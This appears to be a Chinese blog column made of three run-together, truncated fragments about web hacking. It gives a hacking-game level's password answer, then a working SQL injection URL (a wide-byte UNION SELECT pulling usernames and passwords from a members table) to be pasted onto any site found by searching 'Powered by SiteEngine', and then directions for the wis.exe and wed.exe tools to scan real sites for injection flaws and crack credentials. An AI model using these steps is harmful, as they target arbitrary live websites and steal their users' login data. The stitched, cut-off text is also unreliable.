hit15105的专栏

第一期的址地:     http://hackgame.cnxhacker.net/startgame.asp1>function PassConfirm() {var x=document.password.pass.valueif (x=="go ") {alert("恭喜您，答对了，进入第二关！")window.open("thetwo.asp","_self")

1)在百度中以“Powered by SiteEngine”为关键字进行搜索，随便点击一个网站，域名后输入如下代码(announcements.php?id=1%bf%27%20and%201=2%20%20UNION%20select%201,2,username,4,5,6,7,password,9,10,11%20from%20boka_members%20/*)2)这段代码查询

1)http://www.netxeyes.com/main.html可以下载两个小程序：“wed.exe”和“wis.exe”，其中“wis.exe”是用来扫描某个站点中是否存在SQL注入漏洞的；“wed.exe”则是用来破解SQL注入用户名密码的.2)“wis.exe http://www.as.***.cn/”。前面的“http://”和最后面的“/”是必不可少的，否则将会提示无法进行扫